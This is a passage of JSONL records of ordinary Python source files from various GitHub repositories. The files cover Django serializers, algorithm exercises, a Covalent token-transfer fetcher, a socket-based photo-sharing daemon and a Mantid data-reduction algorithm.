['value', 'kpi_equation']\n\n\nclass KpiMessageSerilizer(serializers.ModelSerializer):\n # assets = serializers.SlugRelatedField(many=True, read_only=True, slug_field='asset_id')\n # message_result = KpiMessageEquationResultSerilizer(many=True, read_only=True)\n\n class Meta:\n model = KpiMessage\n fields = ['asset_id', 'attribute_id', 
'timestamp']\n","repo_name":"mahmoudmostafa0/HeadwayProgram","sub_path":"djangotask/kpi_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"11952903003","text":"import json\nimport logging\n\nfrom luigi import configuration\n\nfrom ..util.validation import validate_file, validate_dir\nfrom ..spawners import SingleInputFileSpawner\nfrom ..tasks import SimulationTask\nfrom ..simulation_inputs import JsonSimulationInput\n\n\ndef create_spawner(task_exe, working_dir, base_file, runner_type):\n \"\"\"\n Creates spawner that creates tasks taking a single JSON input file as command line argument\n\n :param task_exe: Path of executable to run. If None, input files will be written but no tasks run\n :param working_dir: Working directory of task execution\n :param base_file: Baseline JSON file on which to make parameter editions and additions. If None, parameter additions\n will be made onto an empty input\n :return: :class:`SingleInputFileSpawner` object\n \"\"\"\n if task_exe is not None:\n validate_file(task_exe, 'task_exe')\n if working_dir is not None:\n validate_dir(working_dir, 'working_dir')\n if base_file is not None:\n validate_file(base_file, 'base_file')\n\n if task_exe is None:\n task_exe = ''\n if working_dir is None:\n working_dir = '.'\n\n logger = logging.getLogger(__name__)\n logger.info(\"Creating Single input file spawner with JSON input\")\n logger.info(\"task_exe = %s\", task_exe)\n logger.info(\"working_dir = %s\", working_dir)\n logger.info(\"base_file = %s\", base_file)\n logger.info(\"runner_type = %s\", runner_type)\n\n luigi_config = configuration.get_config()\n luigi_config.set(SimulationTask.__name__, '_exe_path', task_exe)\n luigi_config.set(SimulationTask.__name__, '_working_dir', working_dir)\n luigi_config.set(SimulationTask.__name__, '_runner_type', runner_type)\n\n if base_file is not None:\n with open(base_file, 'r') as fp:\n params = json.load(fp)\n else:\n params = {}\n sim_input = JsonSimulationInput(params, indent=2)\n return SingleInputFileSpawner(sim_input, 'input.json')\n","repo_name":"BitBloomTech/spawn","sub_path":"spawn/plugins/json_input_file.py","file_name":"json_input_file.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"34875775570","text":"from node import Node\n\nclass TreeCompressed:\n def __init__(self):\n self.head = None\n\n def pushNode(self, elem):\n if self.head:\n pointer = self.head\n while (pointer.next):\n pointer = pointer.next\n pointer.next = Node(elem)\n else:\n self.head = Node(elem)\n \n def printNode():\n print(head)\n \nif __name__ == \"__main__\":\n TreeCompressed()\n ","repo_name":"imkimura/linkedtree","sub_path":"treeBinary/treeCompress.py","file_name":"treeCompress.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12228025293","text":"class Player:\n def __init__(self, p):\n self.name = p[\"name\"]\n self.age = p[\"age\"]\n self.position = p[\"position\"]\n self.team = p[\"team\"]\n\nplayers = [\n {\n \t\"name\": \"Kevin Durant\", \n \t\"age\":34, \n \t\"position\": \"small forward\", \n \t\"team\": \"Brooklyn Nets\"\n },\n {\n \t\"name\": \"Jason Tatum\", \n \t\"age\":24, \n \t\"position\": \"small forward\", \n \t\"team\": \"Boston Celtics\"\n },\n {\n \t\"name\": 
\"Kyrie Irving\", \n    \t\"age\":32, \n    \t\"position\": \"Point Guard\", \n    \t\"team\": \"Brooklyn Nets\"\n    },\n    {\n    \t\"name\": \"Damian Lillard\", \n    \t\"age\":33, \n    \t\"position\": \"Point Guard\", \n    \t\"team\": \"Portland Trail Blazers\"\n    },\n    {\n    \t\"name\": \"Joel Embiid\", \n    \t\"age\":32, \n    \t\"position\": \"Power Forward\", \n    \t\"team\": \"Philadelphia 76ers\"\n    },\n    {\n    \t\"name\": \"\", \n    \t\"age\":16, \n    \t\"position\": \"P\", \n    \t\"team\": \"en\"\n    }\n]\n\nKevin_Durant=Player(players[0])\nprint(Kevin_Durant.age)","repo_name":"Ethanhe213/Python-Dojo","sub_path":"fundamentals/extras/Challenge1.py","file_name":"Challenge1.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18103741336","text":"#Exercise 4: Add code to the above program to figure out who has the most \n# messages in the file. After all the data has been read and the dictionary \n# has been created, look through the dictionary using a maximum loop \n# (see Chapter 5: Maximum and minimum loops) to find who has the most \n# messages and print how many messages the person has.\n\n\"\"\"\n# Enter a file name: mbox-short.txt\n# cwen@iupui.edu 5\n# Enter a file name: mbox.txt\n# zqian@umich.edu 195\n\"\"\"\n\n\npath = \"/home/tbfk/Documents/VSC/Coursera/PythonDataStructures/\"\ncount = dict()\nfname = path + \"mbox.txt\" #input(\"Enter a file name: \")\nmax_count = None\nperson = None\n\ntry:\n    fhandle = open(fname)\nexcept:\n    print(\"File %s cannot be found\" %fname)\n    exit()\n\nfor line in fhandle:\n    line = line.rstrip()\n    #print(line)\n    if not line.startswith(\"From \"):\n        continue\n    else:\n        words = line.split()\n        #print(words)\n        mailadress = words[1]\n        count[mailadress] = count.get(mailadress,0) + 1\n\nfor key, val in count.items():\n    if (max_count is None) or val > max_count:\n        max_count = val\n        person = key\n\nprint(person, max_count)\n\n","repo_name":"bounty030/Coursera","sub_path":"Python_for_Everybody_Specialization_UMich/PythonDataStructures/week5_chapter9_ex4.py","file_name":"week5_chapter9_ex4.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"4622386695","text":"from PIL import Image\nimport glob\nfrom datetime import datetime\n# Pillow docs: https://pillow.readthedocs.io/en/stable/reference/Image.html\n\nObjectif=Image.open(\"Objectif.jpg\")\npngdict={}\nNB_LIGNES=15\nNB_COLONNES=15\nLARGEUR_PHOTOS=Objectif.width//NB_COLONNES\nHAUTEUR_PHOTOS=Objectif.height//NB_LIGNES\n\n\n\n# the pixel kept is the most common pixel in the image\ndef moyennepixels(image,largeur=LARGEUR_PHOTOS,hauteur=HAUTEUR_PHOTOS):\n\tcurrentmax=(0,0)\n\tcouleurs={}\n\tfor x in range(largeur):\n\t\tfor y in range(hauteur):\n\t\t\trvb=image.getpixel((x,y))\n\t\t\tif rvb in couleurs.keys():\n\t\t\t\tcouleurs[rvb]+=1\n\t\t\t\tif couleurs[rvb]>currentmax[1]:\n\t\t\t\t\tcurrentmax=(rvb,couleurs[rvb])\n\t\t\telse:\n\t\t\t\tcouleurs[rvb]=0\n\treturn currentmax[0]\n
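\n# Worked example (added, illustrative) for the weighted mean below: if a 2x1\n# region holds the pixels (10, 20, 30) and (30, 20, 10), each channel\n# histogram is averaged separately, giving ((10+30)//2, (20+20)//2,\n# (30+10)//2), i.e. (20, 20, 20).\n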
\n# weighted average for each RGB component\ndef moyennepixels_ponderee(image,largeur=LARGEUR_PHOTOS,hauteur=HAUTEUR_PHOTOS):\n\tred={}\n\tgreen={}\n\tblue={}\n\tfor x in range(largeur):\n\t\tfor y in range(hauteur):\n\t\t\trvb=image.getpixel((x,y))\n\t\t\tif rvb[0] in red.keys():\n\t\t\t\tred[rvb[0]]+=1\n\t\t\telse:\n\t\t\t\tred[rvb[0]]=1\n\t\t\tif rvb[1] in green.keys():\n\t\t\t\tgreen[rvb[1]]+=1\n\t\t\telse:\n\t\t\t\tgreen[rvb[1]]=1\n\t\t\tif rvb[2] in blue.keys():\n\t\t\t\tblue[rvb[2]]+=1\n\t\t\telse:\n\t\t\t\tblue[rvb[2]]=1\n\trouge_num=0\n\tfor i in red.keys():\n\t\trouge_num+=i*red[i]\n\trouge=int(rouge_num/sum(red.values()))\n\tvert_num=0\n\tfor i in green.keys():\n\t\tvert_num+=i*green[i]\n\tvert=int(vert_num/sum(green.values()))\n\tbleu_num=0\n\tfor i in blue.keys():\n\t\tbleu_num+=i*blue[i]\n\tbleu=int(bleu_num/sum(blue.values()))\n\treturn (rouge,vert,bleu)\n\n\ndef initialiseimages():\n\t# store in a dictionary the names of every image whose average colour is already known, with that average colour attached\n\ttry:\n\t\tphotos_connues=open(\"Photos avec moyennes connues.txt\",\"r\")\n\t\ttexte=photos_connues.read()\n\t\tphotos_connues.close()\n\t\tseparation=texte.split(\"|\")\n\t\tseparation.pop()\n\t\tmoyenne_pixels_photo={}\n\t\tfor i in range(0,len(separation),2):\n\t\t\tmoyenne_pixels_photo[separation[i]]=separation[i+1]\n\texcept:\n\t\tmoyenne_pixels_photo={}\n\n\n\tall_images=glob.glob('Images/*')\n\tfor filename in all_images: # for every image in the source folder\n\t\t#print(filename)\n\t\tif filename in moyenne_pixels_photo.keys(): # skip images whose average colour is already known\n\t\t\tcontinue\n\t\tphoto = Image.open(filename)\n\t\tphoto=photo.resize((700,500)) # open them and drop the resolution (source photos are often 5000x3000)\n\t\tpngdict[filename] = photo # keep a reference\n\t\trgb=moyennepixels_ponderee(photo,photo.width,photo.height) # compute the average colour and add it to the dictionary\n\t\tprint(\"Photo {0}\".format(all_images.index(filename)))\n\t\tmoyenne_pixels_photo[filename]=rgb\n\n\tphotos_connues=open(\"Photos avec moyennes connues.txt\",\"w\") # write the new photos with their average colours back to the file\n\tfor nom_fichier in moyenne_pixels_photo.keys():\n\t\tphotos_connues.write(nom_fichier+\"|\"+str(moyenne_pixels_photo[nom_fichier])+\"|\")\n\tphotos_connues.close()\n\n\tprint(\"liste initialisée\")\n\ndef afficher():\n\t# load the dictionary of image names and their known average colours\n\tmoyenne_pixels_photo={}\n\tphotos_connues=open(\"Photos avec moyennes connues.txt\",\"r\")\n\ttexte=photos_connues.read()\n\tphotos_connues.close()\n\tseparation=texte.split(\"|\")\n\tseparation.pop()\n\tfor i in range(0,len(separation),2):\n\t\tmoyenne_pixels_photo[eval(separation[i+1])]=separation[i]\n\n\t# the target portrait is cut into rectangles; for each zone we compute the average colour, look up in the dict\n\t# the filename whose average colour is closest, and display that image (resized) in the portrait's rectangle.\n\tfor colonne in range(NB_COLONNES):\n\t\tprint(\"Colonne {0}\".format(colonne))\n\t\tfor ligne in range(NB_LIGNES):\n\t\t\tbox=(colonne*LARGEUR_PHOTOS,ligne*HAUTEUR_PHOTOS,colonne*LARGEUR_PHOTOS+LARGEUR_PHOTOS,ligne*HAUTEUR_PHOTOS+HAUTEUR_PHOTOS)\n\t\t\tregion=Objectif.crop(box)\n\t\t\tcouleur=moyennepixels_ponderee(region,region.width,region.height)\n\t\t\tmin_difference=10**6\n\t\t\tfor rgb in moyenne_pixels_photo.keys():\n\t\t\t\tdifference=abs(rgb[0]-couleur[0])+abs(rgb[1]-couleur[1])+abs(rgb[2]-couleur[2])\n\t\t\t\tif difference<min_difference:
remove_min(A)\r\n print(f\"Remove element of heap A:\\n x = {x}, A = {A}\")\r\n\r\n # Huffman\r\n C = []\r\n for l in \"abcdefghijklmnopqrstuvwxyz\":\r\n C += [(l, int(rnd.random()*100))]\r\n h = huffman(C)\r\n print(f\"\\nHuffman:\\n{h}\")\r\n\r\nif __name__ == \"__main__\":\r\n __main__()\r\n","repo_name":"edvardlomo/algorithms","sub_path":"datastructures.py","file_name":"datastructures.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1608381495","text":"#-*- coding:utf-8 -*-\n# A program that asks what kind of animal you are and does not end\n# until you answer \"human\"\n# Prepare a variable first\nanswer = input(\"What kind of animal are you?\\n\")\n\n# Write a while loop that keeps going until the answer is \"human\"\nwhile answer != \"human\":\n # Build in different reactions depending on the answer\n if answer == \"alien\":\n print(\"Really!? That is scary, so goodbye!\\n\")\n # end the while loop\n break\n\n elif answer == \"god\":\n print(\"Wow! First time I meet one! ... Stop making fun of me and answer properly!\")\n # update the value once more and go back to the top of the loop.\n answer = input(\"What kind of animal are you really?\\n\")\n continue\n\n # Anything other than human, alien or god probably cannot talk, so ask again\n else :\n print(\"Don't lie! A \" + answer + \" cannot talk\")\n # update the value once more\n answer = input(\"What kind of animal are you really?\\n\")\n\n # this runs only when neither continue nor break happened\n print(\"Did you answer seriously this time? \\n\")\n\n# handle the case where the loop did not end with break == the answer was \"human\"\nelse:\n print(\"Of course! You must be a human!\")\n","repo_name":"yakagika/stat_py","sub_path":"temp/who_are_you.py","file_name":"who_are_you.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18010487019","text":"import json\nimport os\nfrom typing import Any, Generator, Optional\n\nimport dateutil\nfrom celery.utils.log import get_logger\nfrom httpx import AsyncClient, HTTPStatusError, Timeout\n\nfrom .... import db\nfrom ...models import Transfer\nfrom .. 
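# [Editor's note — hypothetical demonstration, not part of any record.] The
# quiz program above ends with a while/else: the else branch runs only when
# the loop condition becomes false, i.e. when the loop was NOT left via
# break. for/else behaves the same way:
def find_first_even(numbers):
    for n in numbers:
        if n % 2 == 0:
            print("found", n)
            break
    else:
        print("no even number")  # reached only when no break fired

find_first_even([1, 3, 5])  # prints "no even number"
find_first_even([1, 4, 5])  # prints "found 4"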
import set_data_and_expiry\n\nCACHE_KEY_TEMPLATE_TRANSFERS = (\n \"covalent_transfer_items_{treasury_address}_{contract_address}_{chain_id}_{date}\"\n)\n\nKEY = os.getenv(\"COVALENT_KEY\")\nTRANSFERS_V2_URL_TEMPLATE = (\n \"https://api.covalenthq.com/v1/{chain_id}/address/{treasury_address}/transfers_v2/\"\n)\n\n\nasync def _get_transfer_items(\n treasury_address: str, contract_address: str, chain_id: int\n) -> Generator[dict[str, Any], None, None]:\n page_number = 0\n while True:\n async with AsyncClient(\n timeout=Timeout(10.0, read=60.0, connect=90.0)\n ) as client:\n resp = await client.get(\n TRANSFERS_V2_URL_TEMPLATE.format(\n chain_id=chain_id, treasury_address=treasury_address\n ),\n params={\n \"quote-currency\": \"USD\",\n \"format\": \"JSON\",\n \"contract-address\": contract_address,\n \"key\": f\"ckey_{KEY}\",\n \"page-number\": page_number,\n },\n )\n resp.raise_for_status()\n data = resp.json()[\"data\"]\n for item in data[\"items\"]:\n yield item\n if not data[\"pagination\"][\"has_more\"]:\n break\n page_number += 1\n\n\nTYPE_SIGN = {\"OUT\": -1, \"IN\": 1}\n\n\ndef _transfers_of_items(transfer_items: list[dict[str, Any]]):\n for block_transaction in transfer_items:\n block_date = dateutil.parser.parse(block_transaction[\"block_signed_at\"])\n for transfer in block_transaction[\"transfers\"]:\n delta = int(transfer[\"delta\"])\n decimals = int(transfer[\"contract_decimals\"])\n if decimals < 0:\n logger = get_logger(__name__)\n logger.error(\n \"Covalent returned negative decimals on contract %s %s %s\",\n transfer[\"contract_name\"],\n transfer[\"contract_ticker_symbol\"],\n transfer[\"contract_address\"],\n )\n amount = TYPE_SIGN[transfer[\"transfer_type\"]] * delta / 10**decimals\n yield Transfer(timestamp=block_date, amount=amount)\n\n\nasync def get_token_transfers(\n treasury_address: str, contract_address: str, chain_id: Optional[int] = 1\n) -> list[Transfer]:\n \"\"\"Returns a list of Transfer objects without balance, backwards in time\n\n Notes\n ---\n The historical token balancce of the given treasury is partial\n because, naturaly, covalent's transfers_v2 endpoint only returns\n historical transfers and doesn't return the balance at the time\n of transfer.\n\n Thus, the balance for a given treasury can only be calculated for\n the date of transfer from the covalent response.\n \"\"\"\n cache_date = dateutil.utils.today(dateutil.tz.UTC).strftime(\"%Y-%m-%d\")\n cache_key = CACHE_KEY_TEMPLATE_TRANSFERS.format(\n treasury_address=treasury_address,\n contract_address=contract_address,\n chain_id=chain_id,\n date=cache_date,\n )\n\n if db.exists(cache_key) > 0:\n transfer_items = json.loads(db.get(cache_key))\n else:\n try:\n transfer_items = [\n _\n async for _ in _get_transfer_items(\n treasury_address, contract_address, chain_id\n )\n ]\n except (\n HTTPStatusError,\n json.decoder.JSONDecodeError,\n KeyError,\n ) as error:\n logger = get_logger(__name__)\n if error.__class__ is HTTPStatusError:\n logger.error(\n \"unable to receive a Covalent `transfers_v2` API response\",\n exc_info=error,\n )\n logger.error(\n \"error processing Covalent `transfers_v2` API response\", exc_info=error\n )\n raise\n\n set_data_and_expiry(cache_key, json.dumps(transfer_items), db)\n\n return 
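# [Editor's note — illustrative sketch of the cache-aside pattern used by
# get_token_transfers in this record; `db` exposing redis-like
# exists/get/set is an assumption, as is the `ex=` expiry argument.]
import json

def cached_fetch(db, key, fetch, ttl_seconds=86400):
    if db.exists(key):
        return json.loads(db.get(key))  # cache hit
    value = fetch()                     # expensive call, e.g. a paginated API
    db.set(key, json.dumps(value), ex=ttl_seconds)
    return value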
list(_transfers_of_items(transfer_items))\n","repo_name":"butterymoney/whip","sub_path":"backend/app/treasury/adapters/covalent/transfers_v2.py","file_name":"transfers_v2.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"15535358842","text":"from typing import (\n List,\n)\nfrom lintcode import (\n Interval,\n)\n\n\"\"\"\nDefinition of Interval:\nclass Interval(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param intervals: an array of meeting time intervals\n @return: the minimum number of conference rooms required\n \"\"\"\n def min_meeting_rooms(self, intervals: List[Interval]) -> int:\n # Write your code here\n import heapq\n heap = []\n\n if not intervals:\n return 0\n\n intervals = sorted(intervals, key= lambda x: x.start)\n\n heapq.heappush(heap, intervals[0].end)\n\n for i in range(1, len(intervals)):\n meeting_end = heapq.heappop(heap)\n if meeting_end > intervals[i].start:\n heapq.heappush(heap, meeting_end)\n heapq.heappush(heap, intervals[i].end)\n\n return len(heap)\n","repo_name":"peterolive/leetcode-question-everyday","sub_path":"MeetingRoomsII.py","file_name":"MeetingRoomsII.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27710836844","text":"import unittest\n\nfrom oandav20.testing import TestCase\n\n\nclass TestPositionsMixin(TestCase):\n\n def test_get_positions_method(self):\n positions = self.oanda.get_positions()\n assert len(positions[\"positions\"]) > 0\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"luca-heltai/oandav20","sub_path":"tests/test_positions_endpoints.py","file_name":"test_positions_endpoints.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8746920575","text":"#!/usr/bin/env python\nfrom distutils.core import setup\nfrom setuptools import find_packages\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nsetup(\n name='scary-cat',\n install_requires=requirements,\n packages=find_packages(),\n entry_points = {\n 'console_scripts': ['scary-cat=scary_cat:main']\n }\n)\n","repo_name":"ashley/scary-cat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"38027446834","text":"\nfrom ast import Break\nfrom os import listdir\nimport os\nimport socket\nfrom os.path import isfile, join\nfrom webbrowser import get\nimport imagehash\nfrom PIL import Image\nimport selectors\nimport time\nimport ast\nfrom requests import request\nfrom src.protocol import CDProto, Message,RegisterMessage, RequestInfo\nimport base64\n\n\nclass daemon:\n \"\"\"Daemon object\"\"\"\n\n def __init__(self,host: str, port: int,connectingNode: int,isMaster : bool = False, imagesFolder: str = \"\"):\n # Server details, host (or ip) to bind to and the port\n self.host = host\n self.port = port\n self.imagesFolder = imagesFolder\n # Events are send back to the given callback\n self.sel = selectors.DefaultSelector()\n\n\n self.isMaster = isMaster\n self.connectingNode = connectingNode\n # Create a unique ID for each node if the ID is not given.\n if isMaster:\n self.port = 5000\n self.id = \"master\"\n else:\n self.id = 
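# [Editor's note — illustrative usage sketch for the heap-based room counter
# in MeetingRoomsII.py above; FakeInterval stands in for lintcode.Interval.]
import heapq

class FakeInterval:
    def __init__(self, start, end):
        self.start, self.end = start, end

def min_rooms(intervals):
    # same algorithm as Solution.min_meeting_rooms: the heap holds the end
    # times of rooms currently in use, smallest first
    if not intervals:
        return 0
    intervals = sorted(intervals, key=lambda x: x.start)
    heap = [intervals[0].end]
    for iv in intervals[1:]:
        earliest_end = heapq.heappop(heap)
        if earliest_end > iv.start:
            heapq.heappush(heap, earliest_end)  # that room is still busy
        heapq.heappush(heap, iv.end)
    return len(heap)

assert min_rooms([FakeInterval(0, 30), FakeInterval(5, 10), FakeInterval(15, 20)]) == 2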
str(port) # Make sure the ID is a string!\n\n # Start the TCP/IP server\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.init_server()\n\n # PROTOCOL PARA ENVIO DE MENSAGENS E AFINS\n self.protocol = CDProto()\n self.connections = {}\n self.clientConnections = {}\n\n # For image Control \n# Images have as an Identifier their name. The localImages Dict matches the identifier with their respective imagehash\n# -----------------------\n# UPDATE----> Now localImages will actually contain matches the identifier with their respective imagehash but also size of the image and Number of colors;\n# PIL.Image.size\n# im = Image.open(r\"C:\\Users\\System-Pc\\Desktop\\lion.png\").convert(\"L\") \n# im1 = Image.Image.getcolors(im) \n# dict = {id: [hash,with,height,numberofcolors]}\n \n# Update on this\n\n# Actually this is Dumb I should just use the size of bytes in a image\n# The more bytes it has the more information it holds the better it is so we keep that one in the DS\n\n\n self.imagesFolder = imagesFolder\n self.localImages, self.hashes = self.imageHashing(imagesFolder)\n self.imagesinNetwork = {}\n self.imagesinNetwork.update(self.imagesmapConn())\n\n\n self.backupDone = False\n\n \n def init_server(self) -> None:\n \"\"\"Initialization of the TCP/IP server to receive connections. It binds to the given host and port.\"\"\"\n print(f\"Initialisation of the Node on port: {self.port} on node ({self.id})\")\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sock.bind((self.host, self.port))\n self.sock.settimeout(10.0)\n self.sock.listen(1)\n\n def imagesmapConn(self):\n newdict = {}\n for key,value in self.localImages.items():\n valor = value\n valor.append(\"this\")\n newdict[key] = valor\n #print(newdict.get(key))\n\n return newdict\n\n def getList(self,dict):\n list = []\n for key in dict.keys():\n list.append(key)\n\n return list\n \n def accept(self,sock, mask):\n conn, addr = sock.accept() # Should be ready\n #print('accepted', conn, 'from', addr)\n self.sel.register(conn, selectors.EVENT_READ, self.read)\n\n def SendConnections(self):\n for i in self.connections.values():\n self.protocol.send_msg(i,self.protocol.connectionUpdate(self.getList(self.connections)))\n\n def read(self,conn, mask):\n mensagem = self.protocol.recv_msg(conn)\n if mensagem == None:\n return\n if mensagem.command == \"disconected\":\n self.sel.unregister(conn)\n #print(\"Closed \" ,conn) \n for key, value in self.connections.items():\n if value == conn:\n del self.connections[key]\n break\n #print(self.connections.keys())\n return\n elif mensagem.command == \"register\":\n address = (mensagem.host,mensagem.port)\n self.connections[address] = conn\n self.SendConnections()\n #print(self.connections.keys())\n\n return\n elif mensagem.command == \"ConnectionUpdate\":\n #print(mensagem.connections)\n for i in mensagem.connections:\n if (i[0],i[1]) not in self.connections and (i[0],i[1]) != (self.host,self.port):\n sock = self.connect(i[0],i[1])\n self.Register(sock,self.host,self.port)\n self.SendImageInfo(sock)\n self.RequestImageInfo(sock)\n #print(self.connections.keys())\n elif mensagem.command == \"ImageInfo\":\n d = ast.literal_eval(mensagem.images)\n dicio = {}\n for i in d.keys():\n hashcode = d.get(i)[0]\n size = d.get(i)[1]\n for localim in self.localImages.values():\n if hashcode == localim[0]:\n if size > localim[1]:\n self.deletefromhere(hashcode)\n #print(size , \">\" , localim[1])\n dicio[i] = [hashcode,size,conn]\n elif size < localim[1]:\n 
self.deletefromThem(conn,hashcode)\n #print(size ,\"<\" , localim[1])\n else:\n dicio[i] = [hashcode,size,conn]\n self.deletefromhere(hashcode)\n #print(\"else\")\n\n break\n else:\n dicio[i] = [hashcode,size,conn]\n\n self.imagesinNetwork.update(dicio)\n if self.backupDone == False:\n self.doBackUp()\n self.backupDone =True\n #print(self.imagesinNetwork)\n elif mensagem.command == \"RequestInfo\":\n self.SendImageInfo(conn)\n elif mensagem.command == \"DeleteImage\":\n self.deleteImage(mensagem.has)\n elif mensagem.command == \"registerClient\":\n self.clientConnections[mensagem.name] = conn\n #print(self.clientConnections)\n elif mensagem.command == \"GetImageList\":\n lista = self.imagesinNetwork.keys()\n mensagem = self.protocol.ListOfImages(list(lista))\n self.protocol.send_msg(conn,mensagem)\n elif mensagem.command == \"GetImageRequest\":\n if mensagem.imageName not in list(self.imagesinNetwork.keys()):\n self.protocol.send_msg(conn,self.protocol.notfound())\n return\n if mensagem.imageName in list(self.localImages.keys()):\n encodedImg = self.imageToText(mensagem.imageName)\n message = self.protocol.actualImage(encodedImg)\n self.protocol.send_msg(conn,message)\n else:\n array = self.imagesinNetwork.get(mensagem.imageName)\n for key,value in self.clientConnections.items():\n if value == conn:\n mensagem = self.protocol.askforImage(mensagem.imageName,key)\n self.protocol.send_msg(array[2],mensagem)\n elif mensagem.command == \"AskforImage\":\n encodedImg = self.imageToText(mensagem.imageName)\n message = self.protocol.sendtoDeamon(encodedImg,mensagem.user)\n self.protocol.send_msg(conn,message)\n elif mensagem.command == \"sendToDeamon\":\n mens= self.protocol.actualImage(mensagem.imagem)\n self.protocol.send_msg(self.clientConnections[mensagem.user],mens)\n\n\n def imageHashing(self,Folder):\n \"\"\"\"IMAGE HASHING\n Will hash all the images from our local folder using the imagehash library\n \"\"\" \n imageHashes = {} # name : hash\n\n hashes = []\n files = [f for f in listdir(Folder) if isfile(join(Folder, f))]\n\n \n for currentImage in files:\n hash = imagehash.average_hash(Image.open(Folder + currentImage))\n if (hash.__str__() in imageHashes.values()):\n #print(\"Image \"+ (Folder + currentImage)+\" is repeated.\"+ \" It was Removed\")\n os.remove(Folder + currentImage)\n continue\n #print(currentImage + \" \" + hash.__str__())\n imageHashes[currentImage] = hash.__str__()\n\n for i in imageHashes.keys():\n tamanho = os.stat(Folder + i).st_size\n hashes.append(imageHashes.get(i))\n imageHashes[i] = [imageHashes.get(i),tamanho]\n\n #print(imageHashes)\n return imageHashes ,hashes\n \n \n def loop(self):\n \n if not self.isMaster:\n self.MasterSock = self.connect(\"localhost\",self.connectingNode)\n self.Register(self.MasterSock,self.host,self.port)\n self.connections[(\"localhost\",self.connectingNode)] = self.MasterSock\n self.RequestImageInfo(self.MasterSock)\n\n\n\n self.sel.register(self.sock, selectors.EVENT_READ, self.accept)\n while True:\n events = self.sel.select()\n for key, mask in events:\n callback = key.data\n callback(key.fileobj, mask)\n\n def deleteImage(self,imageName):\n #print(\"Deleting from here \"+ imageName)\n for key, value in self.localImages.items():\n if value[0] == imageName: \n #print(\"Deleting from here \"+ key)\n \n os.remove(self.imagesFolder + key)\n \n self.localImages.pop(key)\n\n\n\n\n def deletefromhere(self,hashcode):\n #print(\"Deleting from here \"+hashcode)\n\n for key,value in self.localImages.items():\n if value[0] == hashcode:\n 
#DeleteActualFIle\n os.remove(self.imagesFolder + key)\n\n\n #Remove From Dict\n self.localImages.pop(key)\n break\n\n\n\n def deletefromThem(self,sock,hashcode):\n #print(\"Deleting from THe other Node \"+hashcode)\n mensagem = self.protocol.Deleteimages(hashcode)\n self.protocol.send_msg(sock,mensagem)\n\n\n def Register(self,sock,host,port):\n mensagem = self.protocol.register(host,port)\n self.protocol.send_msg(sock,mensagem)\n\n self.SendImageInfo(sock)\n\n def SendImageInfo(self, sock):\n mensagem = self.protocol.imageInfo(self.localImages)\n self.protocol.send_msg(sock,mensagem)\n\n def RequestImageInfo(self,sock):\n mensagem = self.protocol.requestInfo()\n self.protocol.send_msg(sock,mensagem)\n\n # Used for debugging as no purpuse, just like as all\n def sendStr(self,sock: socket,Message):\n sock.sendall(str.encode(Message))\n\n def connect(self,host,port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host,port))\n sock.setblocking(False)\n self.sel.register(sock, selectors.EVENT_READ, self.read)\n return sock\n \n def imageToText(self,imageName):\n with open(self.imagesFolder + imageName, \"rb\") as file:\n encoded_img = base64.b64encode(file.read()).decode('utf-8')\n\n return encoded_img\n\n def doBackUp(self):\n for key, value in self.connections.items():\n #print(key)\n pass\n\n","repo_name":"Rafael-Remigio/Distributed-Photo-Organizer","sub_path":"src/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":11484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"7684569636","text":"from mantid.kernel import *\nfrom mantid.api import *\nfrom mantid.simpleapi import *\nfrom mantid import config\n\nimport os\n\n\ndef _str_or_none(s):\n return s if s != \"\" else None\n\n\ndef _ws_or_none(s):\n return mtd[s] if s != \"\" else None\n\n\ndef _elems_or_none(l):\n return l if len(l) != 0 else None\n\n\ndef add_missing_elements(from_list, to_list):\n to_list.extend([element for element in from_list if element not in to_list])\n return sorted(to_list)\n\n\nclass ISISIndirectEnergyTransfer(DataProcessorAlgorithm):\n _chopped_data = None\n _data_files = None\n _load_logs = None\n _calibration_ws = None\n _instrument_name = None\n _analyser = None\n _reflection = None\n _efixed = None\n _spectra_range = None\n _background_range = None\n _rebin_string = None\n _detailed_balance = None\n _scale_factor = None\n _fold_multiple_frames = None\n _grouping_method = None\n _grouping_ws = None\n _grouping_string = None\n _grouping_map_file = None\n _output_x_units = None\n _output_ws = None\n _sum_files = None\n _ipf_filename = None\n _workspace_names = None\n\n def category(self):\n return \"Workflow\\\\Inelastic;Inelastic\\\\Indirect\"\n\n def 